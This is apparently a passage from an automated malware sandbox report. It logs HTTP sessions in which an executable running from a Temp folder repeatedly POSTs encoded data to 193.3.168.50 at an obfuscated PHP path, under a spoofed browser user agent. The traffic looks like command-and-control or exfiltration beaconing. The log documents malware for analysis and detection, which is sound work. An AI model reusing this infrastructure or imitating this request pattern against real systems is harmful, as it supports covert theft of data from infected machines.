17 | 192.168.2.4 | 49760 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:39.088969946 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1056
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:53:39.440166950 CET | 1056 | OUT | Data Raw: 5f 5c 5a 5b 59 58 5a 56 5a 58 51 52 55 57 5a 5f 50 57 5d 5a 59 5f 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _\Z[YXZVZXQRUWZ_PW]ZY_WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8 %Y?9\#%98?1 *;.07]3?0W#0=<E!#<R*-#G $],5
Dec 5, 2024 10:53:40.327800989 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49761 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:40.566241026 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1936
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:40.952542067 CET | 1936 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:41.755453110 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:41.993649960 CET | 349 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:41 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: [encoded chunked response body, hex dump not reproduced]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49762 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:41.147509098 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:41.502707005 CET | 1060 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:42.385531902 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:42.617727041 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:42 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49763 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:42.855597973 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1056
  Expect: 100-continue
Dec 5, 2024 10:53:43.205878973 CET | 1056 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:44.100519896 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:44.337546110 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:43 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49764 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:44.580044985 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:44.924592018 CET | 1060 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:45.814090014 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:46.049483061 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:45 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49765 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:46.295015097 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:46.643309116 CET | 1060 | OUT | Data Raw: [encoded request body, hex dump not reproduced]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49766 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:47.124984980 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1936
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:47.471735954 CET | 1936 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:48.371664047 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:48.605647087 CET | 349 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: [encoded chunked response body, hex dump not reproduced]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49767 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:47.246284008 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1056
  Expect: 100-continue
  Connection: Keep-Alive
Dec 5, 2024 10:53:47.596373081 CET | 1056 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:48.483824968 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:48.717506886 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:48 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49768 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:48.965683937 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
  Content-Type: application/octet-stream
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 193.3.168.50
  Content-Length: 1060
  Expect: 100-continue
Dec 5, 2024 10:53:49.315287113 CET | 1060 | OUT | Data Raw: [encoded request body, hex dump not reproduced]
Dec 5, 2024 10:53:50.204859972 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:50.437592983 CET | 200 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 05 Dec 2024 09:53:50 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49769 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:50.686804056 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:51.033956051 CET | 1060 | OUT | Data Raw: 5a 5e 5f 5a 59 5b 5a 55 5a 58 51 52 55 51 5a 5c 50 56 5d 5a 59 52 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: Z^_ZY[ZUZXQRUQZ\PV]ZYRWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^- Y<Z4&68<=\ (T.#'Z$<0R !Z360#)#G $],=
Dec 5, 2024 10:53:51.924709082 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:52.157598019 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:53:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49770 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:52.403414965 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:52.752778053 CET | 1060 | OUT | Data Raw: 5f 5c 5f 5a 59 56 5a 57 5a 58 51 52 55 55 5a 5d 50 51 5d 5e 59 5e 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: _\_ZYVZWZXQRUUZ]PQ]^Y^WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X/35=9+ 6),* ) .<',7&'$B6 '*#G $],-
Dec 5, 2024 10:53:53.640650034 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49771 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:53.733421087 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1924
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:54.080806971 CET | 1924 | OUT | Data Raw: 5f 5c 5f 52 59 5e 5f 53 5a 58 51 52 55 57 5a 5a 50 55 5d 53 59 5e 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: _\_RY^_SZXQRUWZZPU]SY^WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.80!^<Z#"Z/&#$V:70S#['>86 =#G $],!
Dec 5, 2024 10:53:54.971354961 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:55.205805063 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:53:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 09 11 25 5a 24 2b 02 53 27 2f 27 1a 2b 33 33 00 2e 23 23 59 30 2e 07 45 25 2a 09 56 2a 03 23 1f 20 3e 39 03 3c 39 24 0b 3f 0e 2b 0f 29 38 20 58 00 1a 26 1a 21 32 38 13 2e 07 01 05 26 03 29 06 24 13 26 04 29 39 33 15 2a 0a 37 0c 25 58 22 14 29 0d 00 0d 3b 1a 2a 04 3a 2d 3d 07 31 3f 2a 52 0e 17 21 56 28 2d 20 5a 20 22 35 50 3e 32 24 04 29 3f 2c 0f 30 01 25 09 34 07 3d 55 24 33 3d 10 24 31 22 55 30 38 3b 1d 26 11 30 59 3d 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 98%Z$+S'/'+33.##Y0.E%*V*# >9<9$?+)8 X&!28.&)$&)93*7%X");*:-=1?*R!V(- Z "5P>2$)?,0%4=U$3=$1"U08;&0Y= _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49772 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:53.854407072 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:54.227942944 CET | 1060 | OUT | Data Raw: 5f 5c 5f 5e 59 57 5a 5f 5a 58 51 52 55 55 5a 58 50 5e 5d 5f 59 5e 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: _\_^YWZ_ZXQRUUZXP^]_Y^WF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ !\(9'#6=,?- ;-U(%,8R#19'.+"08V*=#G $],-
Dec 5, 2024 10:53:55.099199057 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:55.337575912 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:53:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49774 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:55.577171087 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
Dec 5, 2024 10:53:55.924618959 CET | 1060 | OUT | Data Raw: 5a 5c 5f 5c 59 5a 5a 56 5a 58 51 52 55 52 5a 52 50 56 5d 52 59 5d 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: Z\_\YZZVZXQRURZRPV]RY]WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ =9 658<2#)(S93;0342![0>+"(V==#G $],1
Dec 5, 2024 10:53:56.814743996 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:57.049464941 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:53:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49776 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:57.295377970 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:57.643596888 CET | 1060 | OUT | Data Raw: 5f 50 5f 58 59 5b 5a 56 5a 58 51 52 55 56 5a 53 50 56 5d 5d 59 5e 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: _P_XY[ZVZXQRUVZSPV]]Y^WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/V%\(9<X %&\8.#)-##\%,/4'(#0>#G $],!
Dec 5, 2024 10:53:58.534506083 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:53:58.769474983 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:53:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49782 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:53:59.012243986 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:53:59.362354994 CET | 1060 | OUT | Data Raw: 5f 5c 5a 5f 59 5a 5f 57 5a 58 51 52 55 50 5a 5c 50 50 5d 5f 59 5e 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: _\Z_YZ_WZXQRUPZ\PP]_Y^WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,:=)#76-/?! ?9 0,$T#9$- " )-#G $],
Dec 5, 2024 10:54:00.249665022 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49783 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:00.342746973 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1936
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:00.690269947 CET | 1936 | OUT | Data Raw: 5a 5a 5a 59 5c 5d 5a 55 5a 58 51 52 55 53 5a 5c 50 51 5d 5f 59 5a 57 40 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
